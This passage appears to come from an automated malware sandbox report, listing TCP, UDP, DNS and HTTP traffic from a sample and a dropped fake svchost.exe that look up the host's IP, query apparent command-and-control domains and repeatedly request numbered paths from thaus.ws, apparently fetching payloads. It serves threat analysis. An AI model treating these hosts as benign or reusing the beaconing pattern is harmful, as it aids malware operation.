Jan 18, 2021 00:48:01.770395994 CET	49802	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:48:07.770947933 CET	49802	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:48:19.886033058 CET	49803	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:48:22.897093058 CET	49803	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:48:28.897716999 CET	49803	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:48:41.027645111 CET	49804	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:48:44.039340973 CET	49804	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:48:50.055521965 CET	49804	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:49:02.187479019 CET	49805	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:49:05.197336912 CET	49805	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:49:11.213546038 CET	49805	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:49:23.456424952 CET	49806	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:23.651726961 CET	80	49806	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:23.652822971 CET	49806	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:23.653237104 CET	49806	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:23.848298073 CET	80	49806	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:23.848330021 CET	80	49806	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:23.848845005 CET	49806	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:23.848959923 CET	49806	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:23.966908932 CET	49807	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:24.043948889 CET	80	49806	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:24.161609888 CET	80	49807	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:24.161706924 CET	49807	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:24.162350893 CET	49807	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:24.357146025 CET	80	49807	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:24.357183933 CET	80	49807	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:24.358246088 CET	49807	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:24.358396053 CET	49807	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:24.468981028 CET	49808	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:24.552939892 CET	80	49807	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:24.664664030 CET	80	49808	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:24.665416956 CET	49808	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:24.666086912 CET	49808	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:24.861619949 CET	80	49808	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:24.861651897 CET	80	49808	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:24.861807108 CET	49808	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:24.862030983 CET	49808	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:24.968657970 CET	49809	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:25.057640076 CET	80	49808	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:25.164336920 CET	80	49809	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:25.164504051 CET	49809	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:25.165559053 CET	49809	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:25.372278929 CET	80	49809	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:25.372313023 CET	80	49809	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:25.373138905 CET	49809	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:25.373358011 CET	49809	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:25.482981920 CET	49810	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:25.571238995 CET	80	49809	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:25.677772045 CET	80	49810	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:25.677922964 CET	49810	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:25.678602934 CET	49810	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:25.873282909 CET	80	49810	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:25.873317957 CET	80	49810	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:25.874350071 CET	49810	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:25.874500036 CET	49810	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:25.983872890 CET	49811	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:26.069226027 CET	80	49810	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:26.179172039 CET	80	49811	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:26.180305958 CET	49811	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:26.180805922 CET	49811	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:26.375961065 CET	80	49811	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:26.375993967 CET	80	49811	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:26.376276970 CET	49811	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:26.376446009 CET	49811	80	192.168.2.3	64.70.19.203
Jan 18, 2021 00:49:26.571650028 CET	80	49811	64.70.19.203	192.168.2.3
Jan 18, 2021 00:49:26.812632084 CET	49812	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:49:29.824409008 CET	49812	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:49:35.840538025 CET	49812	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:49:47.971661091 CET	49813	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:49:50.982364893 CET	49813	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:49:56.998492002 CET	49813	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:50:09.127855062 CET	49814	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:50:12.140367031 CET	49814	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:50:18.140872955 CET	49814	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:50:30.263408899 CET	49815	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:50:33.267129898 CET	49815	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:50:39.267674923 CET	49815	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:50:51.382672071 CET	49816	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:50:54.393882036 CET	49816	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:51:00.394417048 CET	49816	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:51:12.509325027 CET	49817	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:51:15.520625114 CET	49817	80	192.168.2.3	185.215.113.10
Jan 18, 2021 00:51:21.521589994 CET	49817	80	192.168.2.3	185.215.113.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 18, 2021 00:40:06.593794107 CET	60152	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:06.641812086 CET	53	60152	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:07.840378046 CET	57544	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:07.897131920 CET	53	57544	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:08.906424999 CET	55984	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:08.957648993 CET	53	55984	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:10.034730911 CET	64185	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:10.082618952 CET	53	64185	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:10.991529942 CET	65110	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:11.056278944 CET	53	65110	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:12.018767118 CET	58361	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:12.077210903 CET	53	58361	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:13.005631924 CET	63492	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:13.056632042 CET	53	63492	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:14.153115034 CET	60831	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:14.212385893 CET	53	60831	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:15.140526056 CET	60100	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:15.191596031 CET	53	60100	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:15.552069902 CET	53195	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:15.613980055 CET	53	53195	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:16.401894093 CET	50141	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:16.461178064 CET	53	50141	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:17.370651960 CET	53023	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:17.426872015 CET	53	53023	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:18.358330011 CET	49563	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:18.414757013 CET	53	49563	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:19.752973080 CET	51352	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:19.809664011 CET	53	51352	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:20.844355106 CET	59349	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:20.892311096 CET	53	59349	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:30.104269028 CET	57084	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:30.165285110 CET	53	57084	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:33.070589066 CET	58823	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:33.118567944 CET	53	58823	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:38.787136078 CET	57568	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:38.865700006 CET	53	57568	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:41.335319042 CET	50540	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:41.394622087 CET	53	50540	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:45.825501919 CET	54366	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:45.884251118 CET	53	54366	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:50.391597033 CET	53034	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:50.448270082 CET	53	53034	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:54.325750113 CET	57762	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:54.392743111 CET	53	57762	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:54.461059093 CET	55435	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:54.517482996 CET	53	55435	8.8.8.8	192.168.2.3
Jan 18, 2021 00:40:59.591955900 CET	50713	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:40:59.651201963 CET	53	50713	8.8.8.8	192.168.2.3
Jan 18, 2021 00:41:09.170578957 CET	56132	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:41:09.221309900 CET	53	56132	8.8.8.8	192.168.2.3
Jan 18, 2021 00:41:11.997498989 CET	58987	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:41:12.056273937 CET	53	58987	8.8.8.8	192.168.2.3
Jan 18, 2021 00:41:43.628142118 CET	56579	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:41:43.676115990 CET	53	56579	8.8.8.8	192.168.2.3
Jan 18, 2021 00:41:45.199116945 CET	60633	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:41:45.263679028 CET	53	60633	8.8.8.8	192.168.2.3
Jan 18, 2021 00:42:43.069108963 CET	61292	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:42:43.128101110 CET	53	61292	8.8.8.8	192.168.2.3
Jan 18, 2021 00:42:49.997932911 CET	63619	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:42:50.204024076 CET	53	63619	8.8.8.8	192.168.2.3
Jan 18, 2021 00:42:54.929253101 CET	64938	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:42:54.990041018 CET	53	64938	8.8.8.8	192.168.2.3
Jan 18, 2021 00:42:55.567682028 CET	61946	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:42:55.627183914 CET	53	61946	8.8.8.8	192.168.2.3
Jan 18, 2021 00:42:56.224052906 CET	64910	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:42:56.280459881 CET	53	64910	8.8.8.8	192.168.2.3
Jan 18, 2021 00:42:56.697513103 CET	52123	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:42:56.799459934 CET	53	52123	8.8.8.8	192.168.2.3
Jan 18, 2021 00:42:57.371412039 CET	56130	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:42:57.430660009 CET	53	56130	8.8.8.8	192.168.2.3
Jan 18, 2021 00:42:58.086716890 CET	56338	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:42:58.143644094 CET	53	56338	8.8.8.8	192.168.2.3
Jan 18, 2021 00:42:58.982589006 CET	59420	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:42:59.041059971 CET	53	59420	8.8.8.8	192.168.2.3
Jan 18, 2021 00:42:59.737337112 CET	58784	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:42:59.794004917 CET	53	58784	8.8.8.8	192.168.2.3
Jan 18, 2021 00:43:00.950521946 CET	63978	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:43:01.007060051 CET	53	63978	8.8.8.8	192.168.2.3
Jan 18, 2021 00:43:01.483570099 CET	62938	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:43:01.543070078 CET	53	62938	8.8.8.8	192.168.2.3
Jan 18, 2021 00:44:55.576267004 CET	55708	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:44:55.624301910 CET	53	55708	8.8.8.8	192.168.2.3
Jan 18, 2021 00:44:56.295573950 CET	56803	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:44:56.360064030 CET	53	56803	8.8.8.8	192.168.2.3
Jan 18, 2021 00:44:57.787440062 CET	57145	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:44:57.993674994 CET	53	57145	8.8.8.8	192.168.2.3
Jan 18, 2021 00:44:59.330039978 CET	55359	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:44:59.405170918 CET	53	55359	8.8.8.8	192.168.2.3
Jan 18, 2021 00:45:02.201245070 CET	58306	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:45:02.268404007 CET	53	58306	8.8.8.8	192.168.2.3
Jan 18, 2021 00:45:02.595109940 CET	64124	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:45:02.666991949 CET	53	64124	8.8.8.8	192.168.2.3
Jan 18, 2021 00:45:04.907721996 CET	49361	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:45:04.978465080 CET	53	49361	8.8.8.8	192.168.2.3
Jan 18, 2021 00:45:09.223346949 CET	63150	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:45:09.379812956 CET	53	63150	8.8.8.8	192.168.2.3
Jan 18, 2021 00:47:14.812285900 CET	53279	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:47:14.863137007 CET	53	53279	8.8.8.8	192.168.2.3
Jan 18, 2021 00:47:15.440824032 CET	56881	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:47:15.488698006 CET	53	56881	8.8.8.8	192.168.2.3
Jan 18, 2021 00:47:16.332880020 CET	53642	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:47:16.496937037 CET	53	53642	8.8.8.8	192.168.2.3
Jan 18, 2021 00:47:48.177424908 CET	55667	53	192.168.2.3	8.8.8.8
Jan 18, 2021 00:47:48.244328022 CET	53	55667	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 18, 2021 00:40:15.552069902 CET	192.168.2.3	8.8.8.8	0x42a7	Standard query (0)	api.wipmania.com	A (IP address)	IN (0x0001)
Jan 18, 2021 00:40:30.104269028 CET	192.168.2.3	8.8.8.8	0x3df2	Standard query (0)	api.wipmania.com	A (IP address)	IN (0x0001)
Jan 18, 2021 00:40:41.335319042 CET	192.168.2.3	8.8.8.8	0x7671	Standard query (0)	api.wipmania.com	A (IP address)	IN (0x0001)
Jan 18, 2021 00:40:50.391597033 CET	192.168.2.3	8.8.8.8	0x5c11	Standard query (0)	api.wipmania.com	A (IP address)	IN (0x0001)
Jan 18, 2021 00:40:59.591955900 CET	192.168.2.3	8.8.8.8	0xd42f	Standard query (0)	api.wipmania.com	A (IP address)	IN (0x0001)
Jan 18, 2021 00:42:43.069108963 CET	192.168.2.3	8.8.8.8	0x44c3	Standard query (0)	tsrv3.ru	A (IP address)	IN (0x0001)
Jan 18, 2021 00:42:49.997932911 CET	192.168.2.3	8.8.8.8	0xcdd2	Standard query (0)	tsrv4.ws	A (IP address)	IN (0x0001)
Jan 18, 2021 00:44:57.787440062 CET	192.168.2.3	8.8.8.8	0xeed5	Standard query (0)	tsrv5.top	A (IP address)	IN (0x0001)
Jan 18, 2021 00:45:04.907721996 CET	192.168.2.3	8.8.8.8	0xf028	Standard query (0)	thaus.ws	A (IP address)	IN (0x0001)
Jan 18, 2021 00:45:09.223346949 CET	192.168.2.3	8.8.8.8	0x79dd	Standard query (0)	zzruuoooshfrohu.su	A (IP address)	IN (0x0001)
Jan 18, 2021 00:47:16.332880020 CET	192.168.2.3	8.8.8.8	0x8e53	Standard query (0)	tldrbox.top	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 18, 2021 00:40:15.613980055 CET	8.8.8.8	192.168.2.3	0x42a7	No error (0)	api.wipmania.com		212.83.168.196	A (IP address)	IN (0x0001)
Jan 18, 2021 00:40:30.165285110 CET	8.8.8.8	192.168.2.3	0x3df2	No error (0)	api.wipmania.com		212.83.168.196	A (IP address)	IN (0x0001)
Jan 18, 2021 00:40:41.394622087 CET	8.8.8.8	192.168.2.3	0x7671	No error (0)	api.wipmania.com		212.83.168.196	A (IP address)	IN (0x0001)
Jan 18, 2021 00:40:50.448270082 CET	8.8.8.8	192.168.2.3	0x5c11	No error (0)	api.wipmania.com		212.83.168.196	A (IP address)	IN (0x0001)
Jan 18, 2021 00:40:59.651201963 CET	8.8.8.8	192.168.2.3	0xd42f	No error (0)	api.wipmania.com		212.83.168.196	A (IP address)	IN (0x0001)
Jan 18, 2021 00:42:43.128101110 CET	8.8.8.8	192.168.2.3	0x44c3	No error (0)	tsrv3.ru		127.0.0.1	A (IP address)	IN (0x0001)
Jan 18, 2021 00:42:50.204024076 CET	8.8.8.8	192.168.2.3	0xcdd2	No error (0)	tsrv4.ws		185.215.113.10	A (IP address)	IN (0x0001)
Jan 18, 2021 00:44:55.624301910 CET	8.8.8.8	192.168.2.3	0xb822	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Jan 18, 2021 00:44:57.993674994 CET	8.8.8.8	192.168.2.3	0xeed5	No error (0)	tsrv5.top		127.0.0.1	A (IP address)	IN (0x0001)
Jan 18, 2021 00:45:04.978465080 CET	8.8.8.8	192.168.2.3	0xf028	No error (0)	thaus.ws		64.70.19.203	A (IP address)	IN (0x0001)
Jan 18, 2021 00:45:09.379812956 CET	8.8.8.8	192.168.2.3	0x79dd	No error (0)	zzruuoooshfrohu.su		185.215.113.10	A (IP address)	IN (0x0001)
Jan 18, 2021 00:47:14.863137007 CET	8.8.8.8	192.168.2.3	0xa721	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Jan 18, 2021 00:47:16.496937037 CET	8.8.8.8	192.168.2.3	0x8e53	No error (0)	tldrbox.top		185.215.113.10	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api.wipmania.com

thaus.ws

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49717	212.83.168.196	80	C:\Users\user\Desktop\Br6Pmt0MiZ.exe

Timestamp	kBytes transferred	Direction	Data
Jan 18, 2021 00:40:15.699996948 CET	202	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Host: api.wipmania.com
Jan 18, 2021 00:40:15.755747080 CET	203	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 17 Jan 2021 23:40:15 GMT Content-Type: text/html Content-Length: 17 Connection: keep-alive Keep-Alive: timeout=20 Data Raw: 38 34 2e 31 37 2e 35 32 2e 37 34 3c 62 72 3e 58 58 Data Ascii: 84.17.52.74<br>XX

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49723	212.83.168.196	80	C:\Users\user\Desktop\Br6Pmt0MiZ.exe

Timestamp	kBytes transferred	Direction	Data
Jan 18, 2021 00:40:30.235579014 CET	280	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Host: api.wipmania.com
Jan 18, 2021 00:40:30.291161060 CET	280	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 17 Jan 2021 23:40:30 GMT Content-Type: text/html Content-Length: 17 Connection: keep-alive Keep-Alive: timeout=20 Data Raw: 38 34 2e 31 37 2e 35 32 2e 37 34 3c 62 72 3e 58 58 Data Ascii: 84.17.52.74<br>XX

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49790	64.70.19.203	80	C:\16642873124159\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Jan 18, 2021 00:45:07.674876928 CET	6290	OUT	GET /6 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Host: thaus.ws
Jan 18, 2021 00:45:08.162224054 CET	6290	OUT	GET /6 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Host: thaus.ws
Jan 18, 2021 00:45:08.803083897 CET	6291	OUT	GET /6 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Host: thaus.ws

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49806	64.70.19.203	80	C:\16642873124159\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Jan 18, 2021 00:49:23.653237104 CET	6355	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Host: thaus.ws

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49807	64.70.19.203	80	C:\16642873124159\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Jan 18, 2021 00:49:24.162350893 CET	6356	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Host: thaus.ws

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49808	64.70.19.203	80	C:\16642873124159\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Jan 18, 2021 00:49:24.666086912 CET	6356	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Host: thaus.ws

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49809	64.70.19.203	80	C:\16642873124159\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Jan 18, 2021 00:49:25.165559053 CET	6357	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Host: thaus.ws

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49810	64.70.19.203	80	C:\16642873124159\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Jan 18, 2021 00:49:25.678602934 CET	6358	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Host: thaus.ws

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.3	49811	64.70.19.203	80	C:\16642873124159\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Jan 18, 2021 00:49:26.180805922 CET	6358	OUT	GET /6 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Host: thaus.ws

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49731	212.83.168.196	80	C:\Users\user\Desktop\Br6Pmt0MiZ.exe

Timestamp	kBytes transferred	Direction	Data
Jan 18, 2021 00:40:41.478290081 CET	354	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Host: api.wipmania.com
Jan 18, 2021 00:40:41.534116983 CET	355	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 17 Jan 2021 23:40:41 GMT Content-Type: text/html Content-Length: 17 Connection: keep-alive Keep-Alive: timeout=20 Data Raw: 38 34 2e 31 37 2e 35 32 2e 37 34 3c 62 72 3e 58 58 Data Ascii: 84.17.52.74<br>XX

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49733	212.83.168.196	80	C:\Users\user\Desktop\Br6Pmt0MiZ.exe

Timestamp	kBytes transferred	Direction	Data
Jan 18, 2021 00:40:50.522984028 CET	362	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Host: api.wipmania.com
Jan 18, 2021 00:40:50.578757048 CET	362	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 17 Jan 2021 23:40:50 GMT Content-Type: text/html Content-Length: 17 Connection: keep-alive Keep-Alive: timeout=20 Data Raw: 38 34 2e 31 37 2e 35 32 2e 37 34 3c 62 72 3e 58 58 Data Ascii: 84.17.52.74<br>XX

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49737	212.83.168.196	80	C:\Users\user\Desktop\Br6Pmt0MiZ.exe

Timestamp	kBytes transferred	Direction	Data
Jan 18, 2021 00:40:59.744499922 CET	403	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Host: api.wipmania.com
Jan 18, 2021 00:40:59.800940990 CET	404	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 17 Jan 2021 23:40:59 GMT Content-Type: text/html Content-Length: 17 Connection: keep-alive Keep-Alive: timeout=20 Data Raw: 38 34 2e 31 37 2e 35 32 2e 37 34 3c 62 72 3e 58 58 Data Ascii: 84.17.52.74<br>XX

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49785	64.70.19.203	80	C:\16642873124159\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Jan 18, 2021 00:45:05.176337957 CET	6287	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Host: thaus.ws

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49786	64.70.19.203	80	C:\16642873124159\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Jan 18, 2021 00:45:05.674190998 CET	6287	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Host: thaus.ws

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49787	64.70.19.203	80	C:\16642873124159\svchost.exe

Timestamp	kBytes transferred	Direction	Data
Jan 18, 2021 00:45:06.174163103 CET	6288	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Host: thaus.ws

